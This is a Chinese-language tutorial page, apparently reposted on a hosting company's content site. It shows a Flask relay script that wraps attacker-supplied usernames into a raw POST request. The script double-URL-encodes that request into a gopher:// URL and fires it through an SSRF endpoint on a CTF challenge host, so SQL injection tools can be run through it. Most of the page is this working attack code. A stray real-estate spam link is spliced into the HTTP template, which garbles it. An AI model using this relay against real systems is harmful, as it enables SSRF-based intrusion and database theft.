温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Python中怎么使用Flask实现中转注入

发布时间:2021-07-05 16:17:10 来源:亿速云 阅读:178 作者:Leah 栏目:编程语言

Python中怎么使用Flask实现中转注入,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

  1、常常会因为构造网络请求麻烦

  2、写tamper嫌麻烦

  这时候我们的中转注入就来了,这有一个Web题需要我们频繁构造gopher去实现POST或者GET请求,这时候如果我们想要实现更自由的SQL注入,便可使用

  from flask import Flask,request

  from urllib.parse import quote

  import requests

  def urlencode(s):

  res=''

  for c in s:

  fuck=hex(ord(c)).split('0x')[1]

  if len(fuck)==1:

  fuck='0'+fuck

  res+="%"+fuck

  return res

  fuckhtml='''POST /admin.php HTTP/1.1

  Host: 127.0.0.1

  Connection: close

  Content-Type: application/x-www-form-urlencoded

  Content-Length: {length}北海购房网 http://bh.goufang.com/

  username={username}&password=129581926211651571912466741651878684928'''.replace("\n","\r\n")

  tmpPayload= fuckhtml.split("\r\n")[-1]

  tmplength = len(tmpPayload) - len('{username}')

  url="http://eci-2zehhuwx9m3o88h42zup.cloudeci1.ichunqiu.com/ssrf.php?way=gopher%3A%2F%2F127.0.0.1:80%2F_"

  app = Flask(__name__)

  @app.route('/')

  def hello_world():

  username=request.args.get('username')

  shit=fuckhtml.format(username=username,length=str(tmplength+len(username)))

  cookies={'PHPSESSID':'qitbcj1puicm4qcpf8oe1fgc17'}

  page=requests.get(url+urlencode(urlencode(shit)),proxies={'http':'http://127.0.0.1:8081'},cookies=cookies).text

  return page

  if __name__ == '__main__':

  app.run()

关于Python中怎么使用Flask实现中转注入问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI